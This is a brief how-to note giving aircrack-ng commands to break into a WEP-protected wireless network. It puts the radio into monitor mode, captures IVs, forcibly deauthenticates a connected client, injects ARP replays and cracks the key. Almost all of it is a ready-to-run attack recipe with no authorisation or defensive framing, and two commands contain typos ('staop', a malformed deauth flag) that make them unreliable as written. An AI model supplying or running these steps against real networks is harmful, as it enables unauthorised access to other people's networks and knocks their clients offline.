BASIC WEP ATTACK 

Basic WEP Attack using aircrack-ng where you deauth a connected client.  Open authentication assumed.

0.   Put radio into monitor mode:

airmon-ng staop ath0; airmon-ng start wifi0;

1.    Start listening

airodump-ng -ivs --bssid AP:AP:AP:AP:AP:AP --channel 11 --write dump ath0

where AP:AP:AP:AP:AP:AP is the MAC of the Access Point, dump is the name of the file that will contain the IVs

2.     deauth the client

aireplay-ng --deauth 20 -AP:AP:AP:AP:AP:AP -e ssid -c CC:CC:CC:CC:CC:CC ath0

where AP:AP:AP:AP:AP:AP is the MAC of the Access Point and CC:CC:CC:CC:CC:CC is the MAC of the client.  Hopefully the ARP count starts hopping.

3.    Do Arpreplay (injection) to force the IV count

aireplay-ng --arpreplay -b AP:AP:AP:AP:AP:AP ath0

You may need to fakeauth but the protocol above works great on the eee under Back Track 3.

4.    Crack

aircrack-ng dump-01.ivs